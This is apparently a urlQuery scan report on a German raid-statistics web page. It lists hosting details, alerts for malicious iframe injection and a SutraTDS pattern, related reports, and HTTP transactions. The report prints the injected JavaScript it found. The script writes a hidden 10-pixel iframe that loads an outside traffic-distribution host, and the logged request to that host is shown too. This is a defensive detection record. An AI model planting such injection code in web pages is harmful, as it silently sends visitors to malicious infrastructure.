Overview

URLhttp://raidstats.liebesbude.de/oct_07/07_10_04_void/
IP85.14.216.82
ASNAS13301 UNITED COLO GmbH
Location Germany
Report completed2012-11-09 07:13:43 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection
Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 85.14.216.82

Date Alerts / IDS URL IP
2012-11-21 16:41:232 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-21 16:37:542 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:53:482 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:45:152 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-18 16:53:072 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill85.14.216.82
2012-11-18 00:27:562 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill/85.14.216.82

Last 6 reports on ASN: AS13301 UNITED COLO GmbH

Date Alerts / IDS URL IP
2013-02-11 17:03:512 / 0http://tobisre.to.funpic.de/catalog213.202.225.65
2013-02-11 12:57:040 / 2http://svgerlfangen.funpic.de/213.202.225.33
2013-02-10 13:09:140 / 0http://213.202.225.205213.202.225.205
2013-02-08 21:41:550 / 0http://alexis.al.ohost.de213.202.225.39
2013-02-08 11:55:101 / 5http://kiki.ki.funpic.de/213.202.225.59
2013-02-08 03:10:190 / 4http://buntesegel.de/887.jar89.163.160.242

Last 6 reports on domain: raidstats.liebesbude.de

Date Alerts / IDS URL IP
2012-11-21 16:41:232 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-21 16:37:542 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:53:482 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:45:152 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-18 16:53:072 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill85.14.216.82
2012-11-18 00:27:562 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill/85.14.216.82



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 561, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://infolinesw.biz/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://infolinesw.biz/in.cgi?2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (0)



HTTP Transactions (10)


Request Response 
GET /oct_07/07_10_04_void/custom.css HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:37:05 GMT
Etag: &quot;360b4-0-bfccde40&quot;
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /oct_07/07_10_04_void/tooltip.js HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:53 GMT
Etag: &quot;36090-40e-bf15c340&quot;
Accept-Ranges: bytes
Content-Length: 1038
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /oct_07/07_10_04_void/recap.css HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:56 GMT
Etag: &quot;3609a-10f3-bf438a00&quot;
Accept-Ranges: bytes
Content-Length: 4339
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /oct_07/07_10_04_void/img/Help.gif HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:51 GMT
Etag: &quot;3608a-4af-bef73ec0&quot;
Accept-Ranges: bytes
Content-Length: 1199
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /oct_07/07_10_04_void/rengine.js HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:56 GMT
Etag: &quot;36098-1150-bf438a00&quot;
Accept-Ranges: bytes
Content-Length: 4432
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /oct_07/07_10_04_void/ HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Mon, 25 Jul 2011 08:56:14 GMT
Etag: &quot;360a4-6a18-fcc8c780&quot;
Accept-Ranges: bytes
Content-Length: 27160
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Fri, 09 Nov 2012 06:35:29 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
GET /favicon.ico HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Fri, 09 Nov 2012 06:35:32 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
GET /in.cgi?2 HTTP/1.1

Host: infolinesw.biz

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
 


 
 
GET /counter/c2.php?lang=en&id=indx&uid=B08F4AF1 HTTP/1.1

Host: www.lossendil.fr
GET /counter/c2.php?lang=en&amp;id=indx&amp;uid=B08F4AF1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/